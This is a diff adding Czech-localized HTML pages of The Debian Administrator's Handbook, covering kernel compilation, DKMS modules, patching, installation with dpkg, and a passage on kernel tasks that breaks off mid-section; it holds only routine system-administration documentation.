+              class="xref"
+              href="sect.apt-get.html#sect.apt-mix-distros">6.2.6 – „Working with Several Distributions“</a>). Note that the source code contained in these packages does not correspond precisely with that published by Linus Torvalds and the kernel developers; like all distributions, Debian applies a number of patches, which might (or might not) find their way into the upstream version of Linux. These modifications include backports of fixes/features/drivers from newer kernel versions, new features not yet (entirely) merged in the upstream Linux tree, and sometimes even Debian specific changes.
+			</div><div
+            class="para">
+				The remainder of this section focuses on the 4.9 version of the Linux kernel, but the examples can, of course, be adapted to the particular version of the kernel that you want.
+			</div><div
+            class="para">
+				We assume the <span
+              class="pkg pkg">linux-source-4.9</span> package has been installed. It contains <code
+              class="filename">/usr/src/linux-source-4.9.tar.xz</code>, a compressed archive of the kernel sources. You must extract these files in a new directory (not directly under <code
+              class="filename">/usr/src/</code>, since there is no need for special permissions to compile a Linux kernel): <code
+              class="filename">~/kernel/</code> is appropriate.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>mkdir ~/kernel; cd ~/kernel</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>tar -xaf /usr/src/linux-source-4.9.tar.xz</code></strong></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Location of kernel sources</strong></p></div></div></div><div
+              class="para">
+				Traditionally, Linux kernel sources would be placed in <code
+                class="filename">/usr/src/linux/</code> thus requiring root permissions for compilation. However, working with administrator rights should be avoided when not needed. There is a <code
+                class="literal">src</code> group that allows members to work in this directory, but working in <code
+                class="filename">/usr/src/</code> should be avoided nevertheless. By keeping the kernel sources in a personal directory, you get security on all counts: no files in <code
+                class="filename">/usr/</code> unknown to the packaging system, and no risk of misleading programs that read <code
+                class="filename">/usr/src/linux</code> when trying to gather information on the used kernel.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-kernel"></a>8.10.3. Configuring the Kernel</h3></div></div></div><a
+            id="id-1.11.14.10.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.10.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.10.4"
+            class="indexterm"></a><div
+            class="para">
+				The next step consists of configuring the kernel according to your needs. The exact procedure depends on the goals.
+			</div><div
+            class="para">
+				When recompiling a more recent version of the kernel (possibly with an additional patch), the configuration will most likely be kept as close as possible to that proposed by Debian. In this case, and rather than reconfiguring everything from scratch, it is sufficient to copy the <code
+              class="filename">/boot/config-<em
+                class="replaceable">version</em></code> file (the version is that of the kernel currently used, which can be found with the <code
+              class="command">uname -r</code> command) into a <code
+              class="filename">.config</code> file in the directory containing the kernel sources.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /boot/config-4.9.0-3-amd64 ~/kernel/linux-source-4.9/.config</code></strong></pre><div
+            class="para">
+				Unless you need to change the configuration, you can stop here and skip to <a
+              class="xref"
+              href="sect.kernel-compilation.html#sect.kernel-build">8.10.4 – „Compiling and Building the Package“</a>. If you need to change it, on the other hand, or if you decide to reconfigure everything from scratch, you must take the time to configure your kernel. There are various dedicated interfaces in the kernel source directory that can be used by calling the <code
+              class="command">make <em
+                class="replaceable">target</em></code> command, where <em
+              class="replaceable">target</em> is one of the values described below.
+			</div><div
+            class="para">
+				<code
+              class="command">make menuconfig</code> compiles and executes a text-mode interface (this is where the <span
+              class="pkg pkg">libncurses5-dev</span> package is required) which allows navigating the options available in a hierarchical structure. Pressing the <span
+              class="keycap"><strong>Space</strong></span> key changes the value of the selected option, and <span
+              class="keycap"><strong>Enter</strong></span> validates the button selected at the bottom of the screen; <span
+              class="guibutton"><strong>Select</strong></span> returns to the selected sub-menu; <span
+              class="guibutton"><strong>Exit</strong></span> closes the current screen and moves back up in the hierarchy; <span
+              class="guibutton"><strong>Help</strong></span> will display more detailed information on the role of the selected option. The arrow keys allow moving within the list of options and buttons. To exit the configuration program, choose <span
+              class="guibutton"><strong>Exit</strong></span> from the main menu. The program then offers to save the changes you've made; accept if you are satisfied with your choices.
+			</div><div
+            class="para">
+				Other interfaces have similar features, but they work within more modern graphical interfaces; such as <code
+              class="command">make xconfig</code> which uses a Qt graphical interface, and <code
+              class="command">make gconfig</code> which uses GTK+. The former requires <span
+              class="pkg pkg">libqt4-dev</span>, while the latter depends on <span
+              class="pkg pkg">libglade2-dev</span> and <span
+              class="pkg pkg">libgtk2.0-dev</span>.
+			</div><div
+            class="para">
+				When using one of those configuration interfaces, it is always a good idea to start from a reasonable default configuration. The kernel provides such configurations in <code
+              class="filename">arch/<em
+                class="replaceable">arch</em>/configs/*_defconfig</code> and you can put your selected configuration in place with a command like <code
+              class="command">make x86_64_defconfig</code> (in the case of a 64-bit PC) or <code
+              class="command">make i386_defconfig</code> (in the case of a 32-bit PC).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Dealing with outdated <code
+                        class="filename">.config</code> files</strong></p></div></div></div><div
+              class="para">
+				When you provide a <code
+                class="filename">.config</code> file that has been generated with another (usually older) kernel version, you will have to update it. You can do so with <code
+                class="command">make oldconfig</code>, it will interactively ask you the questions corresponding to the new configuration options. If you want to use the default answer to all those questions you can use <code
+                class="command">make olddefconfig</code>. With <code
+                class="command">make oldnoconfig</code>, it will assume a negative answer to all questions.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-build"></a>8.10.4. Compiling and Building the Package</h3></div></div></div><a
+            id="id-1.11.14.11.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Clean up before rebuilding</strong></p></div></div></div><div
+              class="para">
+				If you have already compiled once in the directory and wish to rebuild everything from scratch (for example because you substantially changed the kernel configuration), you will have to run <code
+                class="command">make clean</code> to remove the compiled files. <code
+                class="command">make distclean</code> removes even more generated files, including your <code
+                class="filename">.config</code> file too, so make sure to backup it first.
+			</div></div><div
+            class="para">
+				Once the kernel configuration is ready, a simple <code
+              class="command">make deb-pkg</code> will generate up to 5 Debian packages: <span
+              class="pkg pkg">linux-image-<em
+                class="replaceable">version</em></span> that contains the kernel image and the associated modules, <span
+              class="pkg pkg">linux-headers-<em
+                class="replaceable">version</em></span> which contains the header files required to build external modules, <span
+              class="pkg pkg">linux-firmware-image-<em
+                class="replaceable">version</em></span> which contains the firmware files needed by some drivers (this package might be missing when you build from the kernel sources provided by Debian), <span
+              class="pkg pkg">linux-image-<em
+                class="replaceable">version</em>-dbg</span> which contains the debugging symbols for the kernel image and its modules, and <span
+              class="pkg pkg">linux-libc-dev</span> which contains headers relevant to some user-space libraries like GNU glibc.
+			</div><div
+            class="para">
+				The <em
+              class="replaceable">version</em> is defined by the concatenation of the upstream version (as defined by the variables <code
+              class="literal">VERSION</code>, <code
+              class="literal">PATCHLEVEL</code>, <code
+              class="literal">SUBLEVEL</code> and <code
+              class="literal">EXTRAVERSION</code> in the <code
+              class="filename">Makefile</code>), of the <code
+              class="literal">LOCALVERSION</code> configuration parameter, and of the <code
+              class="literal">LOCALVERSION</code> environment variable. The package version reuses the same version string with an appended revision that is regularly incremented (and stored in <code
+              class="filename">.version</code>), except if you override it with the <code
+              class="literal">KDEB_PKGVERSION</code> environment variable.
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>make deb-pkg LOCALVERSION=-falcot KDEB_PKGVERSION=$(make kernelversion)-1
+</code></strong><code
+              class="computeroutput">[...]
+$ </code><strong
+              class="userinput"><code>ls ../*.deb
+</code></strong><code
+              class="computeroutput">../linux-headers-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot-dbg_4.9.30-1_amd64.deb
+../linux-libc-dev_4.9.30-1_amd64.deb
+</code></pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.modules-build"></a>8.10.5. Compiling External Modules</h3></div></div></div><a
+            id="id-1.11.14.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.12.4"
+            class="indexterm"></a><div
+            class="para">
+				Some modules are maintained outside of the official Linux kernel. To use them, they must be compiled alongside the matching kernel. A number of common third party modules are provided by Debian in dedicated packages, such as <span
+              class="pkg pkg">xtables-addons-source</span> (extra modules for iptables) or <span
+              class="pkg pkg">oss4-source</span> (Open Sound System, some alternative audio drivers).
+			</div><div
+            class="para">
+				These external packages are many and varied and we won't list them all here; the <code
+              class="command">apt-cache search source$</code> command can narrow down the search field. However, a complete list isn't particularly useful since there is no particular reason for compiling external modules except when you know you need it. In such cases, the device's documentation will typically detail the specific module(s) it needs to function under Linux.
+			</div><div
+            class="para">
+				For example, let's look at the <span
+              class="pkg pkg">xtables-addons-source</span> package: after installation, a <code
+              class="filename">.tar.bz2</code> of the module's sources is stored in <code
+              class="filename">/usr/src/</code>. While we could manually extract the tarball and build the module, in practice we prefer to automate all this using DKMS. Most modules offer the required DKMS integration in a package ending with a <code
+              class="literal">-dkms</code> suffix. In our case, installing <span
+              class="pkg pkg">xtables-addons-dkms</span> is all that is needed to compile the kernel module for the current kernel provided that we have the <span
+              class="pkg pkg">linux-headers-*</span> package matching the installed kernel. For instance, if you use <span
+              class="pkg pkg">linux-image-amd64</span>, you would also install <span
+              class="pkg pkg">linux-headers-amd64</span>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>sudo apt install xtables-addons-dkms</code></strong>
+<code
+              class="computeroutput">
+[...]
+Setting up xtables-addons-dkms (2.12-0.1) ...
+Loading new xtables-addons-2.12 DKMS files...
+Building for 4.9.0-3-amd64
+Building initial module for 4.9.0-3-amd64
+Done.
+
+xt_ACCOUNT:
+Running module version sanity check.
+ - Original module
+   - No original module exists within this kernel
+ - Installation
+   - Installing to /lib/modules/4.9.0-3-amd64/updates/dkms/
+[...]
+DKMS: install completed.
+$ </code><strong
+              class="userinput"><code>sudo dkms status</code></strong>
+<code
+              class="computeroutput">xtables-addons, 2.12, 4.9.0-3-amd64, x86_64: installed
+$ </code><strong
+              class="userinput"><code>sudo modinfo xt_ACCOUNT</code></strong>
+<code
+              class="computeroutput">filename:       /lib/modules/4.9.0-3-amd64/updates/dkms/xt_ACCOUNT.ko
+license:        GPL
+alias:          ipt_ACCOUNT
+author:         Intra2net AG &lt;opensource@intra2net.com&gt;
+description:    Xtables: per-IP accounting for large prefixes
+[...]
+</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> module-assistant</strong></p></div></div></div><a
+              id="id-1.11.14.12.9.2"
+              class="indexterm"></a><div
+              class="para">
+				Before DKMS, <span
+                class="pkg pkg">module-assistant</span> was the simplest solution to build and deploy kernel modules. It can still be used, in particular for packages lacking DKMS integration: with a simple command like <code
+                class="command">module-assistant auto-install xtables-addons</code> (or <code
+                class="command">m-a a-i xtables-addons</code> for short), the modules are compiled for the current kernel, put in a new Debian package, and that package gets installed on the fly.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-patch"></a>8.10.6. Applying a Kernel Patch</h3></div></div></div><a
+            id="id-1.11.14.13.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.13.3"
+            class="indexterm"></a><div
+            class="para">
+				Some features are not included in the standard kernel due to a lack of maturity or to some disagreement with the kernel maintainers. Such features may be distributed as patches that anyone is then free to apply to the kernel sources.
+			</div><div
+            class="para">
+				Debian sometimes provides some of these patches in <span
+              class="pkg pkg">linux-patch-*</span> packages but they often don't make it into stable releases (sometimes for the very same reasons that they are not merged into the official upstream kernel). These packages install files in the <code
+              class="filename">/usr/src/kernel-patches/</code> directory.
+			</div><div
+            class="para">
+				To apply one or more of these installed patches, use the <code
+              class="command">patch</code> command in the sources directory then start compilation of the kernel as described above.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd ~/kernel/linux-source-4.9</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>make clean</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>zcat /usr/src/kernel-patches/diffs/grsecurity2/grsecurity-3.1-4.9.11-201702181444.patch.gz | patch -p1</code></strong></pre><div
+            class="para">
+				Note that a given patch may not necessarily work with every version of the kernel; it is possible for <code
+              class="command">patch</code> to fail when applying them to kernel sources. An error message will be displayed and give some details about the failure; in this case, refer to the documentation available in the Debian package of the patch (in the <code
+              class="filename">/usr/share/doc/linux-patch-*/</code> directory). In most cases, the maintainer indicates for which kernel versions their patch is intended.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-misc.html"><strong>Předcházející</strong>8.9. Other Configurations: Time Synchronization, ...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-installation.html"><strong>Další</strong>8.11. Installing a Kernel</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.kernel-installation.html b/tmp/cs-CZ/html/sect.kernel-installation.html
new file mode 100644
index 000000000..e91ebfd4c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.kernel-installation.html
@@ -0,0 +1,135 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.11. Installing a Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.kernel-compilation.html"
+        title="8.10. Compiling a Kernel" /><link
+        rel="next"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-compilation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="unix-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-installation"></a>8.11. Installing a Kernel</h2></div></div></div><a
+          id="id-1.11.15.2"
+          class="indexterm"></a><a
+          id="id-1.11.15.3"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-package"></a>8.11.1. Features of a Debian Kernel Package</h3></div></div></div><a
+            id="id-1.11.15.4.2"
+            class="indexterm"></a><div
+            class="para">
+				A Debian kernel package installs the kernel image (<code
+              class="filename">vmlinuz-<em
+                class="replaceable">version</em></code>), its configuration (<code
+              class="filename">config-<em
+                class="replaceable">version</em></code>) and its symbols table (<code
+              class="filename">System.map-<em
+                class="replaceable">version</em></code>) in <code
+              class="filename">/boot/</code>. The symbols table helps developers understand the meaning of a kernel error message; without it, kernel “oopses” (an “oops” is the kernel equivalent of a segmentation fault for user-space programs, in other words messages generated following an invalid pointer dereference) only contain numeric memory addresses, which is useless information without the table mapping these addresses to symbols and function names. The modules are installed in the <code
+              class="filename">/lib/modules/<em
+                class="replaceable">version</em>/</code> directory.
+			</div><div
+            class="para">
+				The package's configuration scripts automatically generate an initrd image, which is a mini-system designed to be loaded in memory (hence the name, which stands for “init ramdisk”) by the bootloader, and used by the Linux kernel solely for loading the modules needed to access the devices containing the complete Debian system (for example, the driver for SATA disks). Finally, the post-installation scripts update the symbolic links <code
+              class="filename">/vmlinuz</code>, <code
+              class="filename">/vmlinuz.old</code>, <code
+              class="filename">/initrd.img</code> and <code
+              class="filename">/initrd.img.old</code> so that they point to the latest two kernels installed, respectively, as well as the corresponding initrd images.
+			</div><div
+            class="para">
+				Most of those tasks are offloaded to hook scripts in the <code
+              class="filename">/etc/kernel/*.d/</code> directories. For instance, the integration with <code
+              class="command">grub</code> relies on <code
+              class="filename">/etc/kernel/postinst.d/zz-update-grub</code> and <code
+              class="filename">/etc/kernel/postrm.d/zz-update-grub</code> to call <code
+              class="command">update-grub</code> when kernels are installed or removed.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-installation-with-dpkg"></a>8.11.2. Installing with <code
+                    class="command">dpkg</code></h3></div></div></div><div
+            class="para">
+				Using <code
+              class="command">apt</code> is so convenient that it makes it easy to forget about the lower-level tools, but the easiest way of installing a compiled kernel is to use a command such as <code
+              class="command">dpkg -i <em
+                class="replaceable">package</em>.deb</code>, where <code
+              class="literal"><em
+                class="replaceable">package</em>.deb</code> is the name of a <span
+              class="pkg pkg">linux-image</span> package such as <code
+              class="filename">linux-image-4.9.30-ckt4-falcot_1_amd64.deb</code>.
+			</div><div
+            class="para">
+				The configuration steps described in this chapter are basic and can lead both to a server system or a workstation, and it can be massively duplicated in semi-automated ways. However, it is not enough by itself to provide a fully configured system. A few pieces are still in need of configuration, starting with low-level programs known as the “Unix services”.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-compilation.html"><strong>Předcházející</strong>8.10. Compiling a Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="unix-services.html"><strong>Další</strong>Kapitola 9. Unix Services</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.kernel-role-and-tasks.html b/tmp/cs-CZ/html/sect.kernel-role-and-tasks.html
new file mode 100644
index 000000000..cf1046e4c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.kernel-role-and-tasks.html
@@ -0,0 +1,250 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.4. Some Tasks Handled by the Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.computer-layers.html"
+        title="B.3. Inner Workings of a Computer: the Different Layers Involved" /><link
+        rel="next"
+        href="sect.user-space.html"
+        title="B.5. The User Space" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-role-and-tasks.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.computer-layers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-space.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-role-and-tasks"></a>B.4. Some Tasks Handled by the Kernel</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.hardware-drivers"></a>B.4.1. Driving the Hardware</h3></div></div></div><div
+            class="para">
+				The kernel is, first and foremost, tasked with controlling the hardware parts, detecting them, switching them on when the computer is powered on, and so on. It also makes them available to higher-level software with a simplified programming interface, so applications can take advantage of devices without having to worry about details such as which extension slot the option board is plugged into. The programming interface also provides an abstraction layer; this allows video-conferencing software, for example, to use a webcam independently of its make and model. The software can just use the <span
+              class="emphasis"><em>Video for Linux</em></span> (V4L) interface, and the kernel translates the function calls of this interface into the actual hardware commands needed by the specific webcam in use.
+			</div><div
+            class="para">
+				<a
+              id="id-1.21.7.2.3.1"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.2"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.3"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.4"
+              class="indexterm"></a> The kernel exports many details about detected hardware through the <code
+              class="filename">/proc/</code> and <code
+              class="filename">/sys/</code> virtual filesystems. Several tools summarize those details. Among them, <code
+              class="command">lspci</code> (in the <span
+              class="pkg pkg">pciutils</span> package) lists PCI devices, <code
+              class="command">lsusb</code> (in the <span
+              class="pkg pkg">usbutils</span> package) lists USB devices, and <code
+              class="command">lspcmcia</code> (in the <span
+              class="pkg pkg">pcmciautils</span> package) lists PCMCIA cards. These tools are very useful for identifying the exact model of a device. This identification also allows more precise searches on the web, which in turn, lead to more relevant documents.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.21.7.2.4"></a><p
+              class="title"><strong>Příklad B.1. Example of information provided by <code
+                  class="command">lspci</code> and <code
+                  class="command">lsusb</code></strong></p><div
+              class="example-contents"><pre
+                class="screen">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>lspci</code></strong>
+<code
+                  class="computeroutput">[...]
+00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
+00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03)
+00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03)
+[...]
+01:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01)
+02:03.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
+$ </code><strong
+                  class="userinput"><code>lsusb</code></strong>
+<code
+                  class="computeroutput">Bus 005 Device 004: ID 413c:a005 Dell Computer Corp.
+Bus 005 Device 008: ID 413c:9001 Dell Computer Corp.
+Bus 005 Device 007: ID 045e:00dd Microsoft Corp.
+Bus 005 Device 006: ID 046d:c03d Logitech, Inc.
+[...]
+Bus 002 Device 004: ID 413c:8103 Dell Computer Corp. Wireless 350 Bluetooth
+</code></pre></div></div><div
+            class="para">
+				These programs have a <code
+              class="literal">-v</code> option, that lists much more detailed (but usually not necessary) information. Finally, the <code
+              class="command">lsdev</code> command (in the <span
+              class="pkg pkg">procinfo</span> package) lists communication resources used by devices.
+			</div><div
+            class="para">
+				Applications often access devices by way of special files created within <code
+              class="filename">/dev/</code> (see sidebar <a
+              class="xref"
+              href="sect.creating-accounts.html#sidebar.special-files"><span
+                class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). These are special files that represent disk drives (for instance, <code
+              class="filename">/dev/hda</code> and <code
+              class="filename">/dev/sdc</code>), partitions (<code
+              class="filename">/dev/hda1</code> or <code
+              class="filename">/dev/sdc3</code>), mice (<code
+              class="filename">/dev/input/mouse0</code>), keyboards (<code
+              class="filename">/dev/input/event0</code>), soundcards (<code
+              class="filename">/dev/snd/*</code>), serial ports (<code
+              class="filename">/dev/ttyS*</code>), and so on.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.filesystems"></a>B.4.2. Filesystems</h3></div></div></div><a
+            id="id-1.21.7.3.2"
+            class="indexterm"></a><a
+            id="id-1.21.7.3.3"
+            class="indexterm"></a><div
+            class="para">
+				Filesystems are one of the most prominent aspects of the kernel. Unix systems merge all the file stores into a single hierarchy, which allows users (and applications) to access data simply by knowing its location within that hierarchy.
+			</div><div
+            class="para">
+				The starting point of this hierarchical tree is called the root, <code
+              class="filename">/</code>. This directory can contain named subdirectories. For instance, the <code
+              class="literal">home</code> subdirectory of <code
+              class="filename">/</code> is called <code
+              class="filename">/home/</code>. This subdirectory can, in turn, contain other subdirectories, and so on. Each directory can also contain files, where the actual data will be stored. Thus, the <code
+              class="filename">/home/rmas/Desktop/hello.txt</code> name refers to a file named <code
+              class="literal">hello.txt</code> stored in the <code
+              class="literal">Desktop</code> subdirectory of the <code
+              class="literal">rmas</code> subdirectory of the <code
+              class="literal">home</code> directory present in the root. The kernel translates between this naming system and the actual, physical storage on a disk.
+			</div><div
+            class="para">
+				Unlike other systems, there is only one such hierarchy, and it can integrate data from several disks. One of these disks is used as the root, and the others are “mounted” on directories in the hierarchy (the Unix command is called <code
+              class="command">mount</code>); these other disks are then available under these “mount points”. This allows storing users' home directories (traditionally stored within <code
+              class="filename">/home/</code>) on a second hard disk, which will contain the <code
+              class="literal">rhertzog</code> and <code
+              class="literal">rmas</code> directories. Once the disk is mounted on <code
+              class="filename">/home/</code>, these directories become accessible at their usual locations, and paths such as <code
+              class="filename">/home/rmas/Desktop/hello.txt</code> keep working.
+			</div><a
+            id="id-1.21.7.3.7"
+            class="indexterm"></a><div
+            class="para">
+				There are many filesystem formats, corresponding to many ways of physically storing data on disks. The most widely known are <span
+              class="emphasis"><em>ext2</em></span>, <span
+              class="emphasis"><em>ext3</em></span> and <span
+              class="emphasis"><em>ext4</em></span>, but others exist. For instance, <span
+              class="emphasis"><em>vfat</em></span> is the system that was historically used by DOS and Windows operating systems, which allows using hard disks under Debian as well as under Windows. In any case, a filesystem must be prepared on a disk before it can be mounted and this operation is known as “formatting”. Commands such as <code
+              class="command">mkfs.ext3</code> (where <code
+              class="command">mkfs</code> stands for <span
+              class="emphasis"><em>MaKe FileSystem</em></span>) handle formatting. These commands require, as a parameter, a device file representing the partition to be formatted (for instance, <code
+              class="filename">/dev/sda1</code>). This operation is destructive and should only be run once, except if one deliberately wishes to wipe a filesystem and start afresh.
+			</div><div
+            class="para">
+				There are also network filesystems, such as <acronym
+              class="acronym">NFS</acronym>, where data is not stored on a local disk. Instead, data is transmitted through the network to a server that stores and retrieves them on demand. The filesystem abstraction shields users from having to care: files remain accessible in their usual hierarchical way.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.shared-functions"></a>B.4.3. Shared Functions</h3></div></div></div><div
+            class="para">
+				Since a number of the same functions are used by all software, it makes sense to centralize them in the kernel. For instance, shared filesystem handling allows any application to simply open a file by name, without needing to worry where the file is stored physically. The file can be stored in several different slices on a hard disk, or split across several hard disks, or even stored on a remote file server. Shared communication functions are used by applications to exchange data independently of the way the data is transported. For instance, transport could be over any combination of local or wireless networks, or over a telephone landline.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.process-management"></a>B.4.4. Managing Processes</h3></div></div></div><a
+            id="id-1.21.7.5.2"
+            class="indexterm"></a><div
+            class="para">
